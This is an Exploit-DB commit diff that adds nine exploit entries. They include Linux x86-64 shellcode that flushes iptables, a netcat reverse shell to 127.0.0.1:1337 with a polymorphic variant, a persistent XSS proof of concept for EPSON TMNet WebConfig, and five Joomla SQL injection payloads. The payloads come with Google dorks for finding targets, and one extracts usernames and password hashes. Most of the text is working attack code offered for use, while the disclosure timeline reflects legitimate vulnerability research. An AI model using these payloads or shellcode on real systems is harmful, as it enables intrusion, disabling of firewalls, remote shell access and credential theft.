DB: 2017-03-06

9 new exploits

Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)
Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)
Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)

Joomla! Component com_jumi - (fileid) Blind SQL Injection
Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection
EPSON TMNet WebConfig 1.00 - Cross-Site Scripting
Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection
Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection
Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection
Joomla! Component Content ConstructionKit 1.1 - SQL Injection
Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection

files.csv

@@ -15928,6 +15928,9 @@ id,file,description,date,author,platform,type,port
 41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
+41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
+41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
+41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -21317,7 +21320,7 @@ id,file,description,date,author,platform,type,port
 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0
 8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0
-8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
+8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
 8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0
 8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0
 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0
@@ -37416,3 +37419,9 @@ id,file,description,date,author,platform,type,port
 41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
 41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
 41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
+41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0
+41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
+41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0

platforms/hardware/webapps/41502.txt

@@ -0,0 +1,57 @@
+# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
+# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
+# Date: 3/3/2017
+# Exploit Author: Michael Benich
+# Vendor Homepage: https://www.epson-biz.com/
+# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
+# Version: 1.00
+# CVE: CVE-2017-6443
+# Contact: benichmt1@protonmail.com // @benichmt1
+#####################################################################################
+
+Summary:
+Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
+
+Steps to reproduce:
+
+1)Make a POST request using Burp Proxy or other application 
+
+------------------------------------------------------------------------------------------
+POST /Forms/oadmin_1 HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
+
+------------------------------------------------------------------------------------------
+2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
+
+GET /istatus.htm HTTP/1.1
+Host: XXX.XXX.XXX.XXX
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://XXX.XXX.XXX.XXX/side.htm
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+------------------------------------------------------------------------------------------
+
+Timeline:
+
+------------------------------------------------------------------------------------------
+12/1/2016 - Discovery.
+12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
+12/16/2016 - Pinged on Twitter. Recommended to contact through support.
+12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
+3/3/2017 - Disclosure
+------------------------------------------------------------------------------------------

platforms/lin_x86-64/shellcode/41503.nasm

@@ -0,0 +1,53 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a 
+;copy of this software and associated documentation files (the “Software”), 
+;to deal in the Software without restriction, including without limitation 
+;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
+;and/or sell copies of the Software, and to permit persons to whom the 
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included 
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability, 
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other 
+;liability, whether in an action of contract, tort or otherwise, arising 
+;from, out of or in connection with the software or the use or other 
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post: 
+; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html 
+
+global _start 
+
+section .text
+
+_start:
+	push 82 
+	pop rax
+	cdq
+	push rdx
+	push word '-F'
+	push rsp
+	pop rbx
+	push rdx
+	mov rcx, 'iptables'
+	push rcx
+	shl al,1
+	sub al,cl
+	mov rcx, '//sbin//'
+	push rcx
+	push rsp
+	pop rdi
+	push rdx
+	push rbx
+	push rdi
+	push rsp
+	pop rsi
+	syscall
+ 

platforms/lin_x86-64/shellcode/41509.nasm

@@ -0,0 +1,70 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a 
+;copy of this software and associated documentation files (the “Software”), 
+;to deal in the Software without restriction, including without limitation 
+;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
+;and/or sell copies of the Software, and to permit persons to whom the 
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included 
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability, 
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other 
+;liability, whether in an action of contract, tort or otherwise, arising 
+;from, out of or in connection with the software or the use or other 
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post: 
+; http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
+
+global _start 
+
+section .text
+
+_start:
+	xor edx,edx
+	push '1337'
+	push rsp
+	pop rcx
+
+	push rdx
+	mov rax,'/bin//sh'
+	push rax
+	push rsp
+	pop rbx
+	
+	push rdx
+	mov rax,'/bin//nc'
+	push rax
+	push rsp
+	pop rdi
+	
+	push '1'
+	mov rax,'127.0.0.'
+	push rax
+	push rsp
+	pop rsi
+
+	push rdx
+	push word '-e'
+	push rsp
+	pop rax
+	
+	push rdx ; push null
+	push rbx ; '/bin//sh'
+	push rax ; '-e'
+	push rcx ; '1337' 
+	push rsi ; '127.0.0.1'
+	push rdi ; '/bin//nc'
+	push rsp
+	pop rsi  ; address of array of pointers to strings
+	
+	push 59  ; execve system call
+	pop rax
+	syscall

platforms/lin_x86-64/shellcode/41510.nsam

@@ -0,0 +1,84 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a 
+;copy of this software and associated documentation files (the “Software”), 
+;to deal in the Software without restriction, including without limitation 
+;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
+;and/or sell copies of the Software, and to permit persons to whom the 
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included 
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability, 
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other 
+;liability, whether in an action of contract, tort or otherwise, arising 
+;from, out of or in connection with the software or the use or other 
+;dealings in the Software.
+; For a detailed explanation of this shellcode see my blog post: 
+; http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html
+
+global _start 
+
+section .text
+
+_start:
+	jmp next
+sh:
+	db 0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f
+nc:
+	db 0x63,0x6e,0x2f,0x2f,0x6e,0x69,0x62,0x2f
+ip:
+	db 0x2e,0x30,0x2e,0x30,0x2e,0x37,0x32,0x31
+handle:
+	pop rcx
+	lodsq
+	bswap rax
+	push rax
+	push rsp
+	push rcx
+	ret
+next:
+	xor edx,edx
+	lea rsi,[rel sh]
+	push rdx
+	call handle
+	pop rbx
+
+	push rdx
+	call handle
+	pop rdi
+
+	push '1'
+	call handle
+	pop r12
+
+	push '1337'
+	push rsp
+	pop rcx
+
+	push rdx
+	push word '-e'
+	push rsp
+	pop rax
+	
+	push rdx ; push null
+	push rbx ; '/bin//sh'
+	push rax ; '-e'
+	push rcx ; '1337' 
+	push r12 ; '127.0.0.1'
+	push rdi ; '/bin//nc'
+	push rsp
+	pop rsi  ; address of array of pointers to strings
+	
+	; some magic to put 3b (59) into RAX	 
+	; note that this depends on the push "-e" 
+	; and it's position on the stack
+	mov rax,[rsp + 48]
+	shr rax,8
+	sub rax,0x2a
+	syscall

platforms/php/webapps/41504.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jux_eventon
+# Date: 04.03.2017
+# Vendor Homepage: http://joomlaux.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
+# Demo: http://demo.joomlaux.com/extensions/eventon/
+# Version: 1.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
+# 3+union+select+1,@@version,3,4,5,6
+# # # # #

platforms/php/webapps/41505.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
+# Google Dork: inurl:index.php?option=com_monthlyarchive
+# Date: 04.03.2017
+# Vendor Homepage: http://web357.eu/
+# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
+# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
+# Version: 3.6.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
+# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
+# # # # #

platforms/php/webapps/41506.txt

@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_aysquiz
+# Date: 04.03.2017
+# Vendor Homepage: http://ays-pro.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
+# Demo: http://demo.ays-pro.com/index.php/ays-quiz
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
+# For example;
+# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
+# :title<li>whlzd_users
+# :id<li>whlzd_users
+# :name<li>whlzd_users
+# :username<li>whlzd_users
+# :email<li>whlzd_users
+# :password<li>whlzd_users
+# :block<li>whlzd_users
+# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
+# <input class='ays_radio hide' type='radio'  id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
+# Etc...
+# # # # #

platforms/php/webapps/41507.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_os_cck
+# Date: 04.03.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
+# Demo: http://ordasvit.com/joomla-cck-classic/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
+# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
+# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key' 
+# Etc..
+# # # # #

platforms/php/webapps/41508.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_altauserpoints
+# Date: 04.03.2017
+# Vendor Homepage: https://www.nordmograph.com/
+# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
+# Demo: https://www.nordmograph.com/workshop/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
+# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
+# # # # #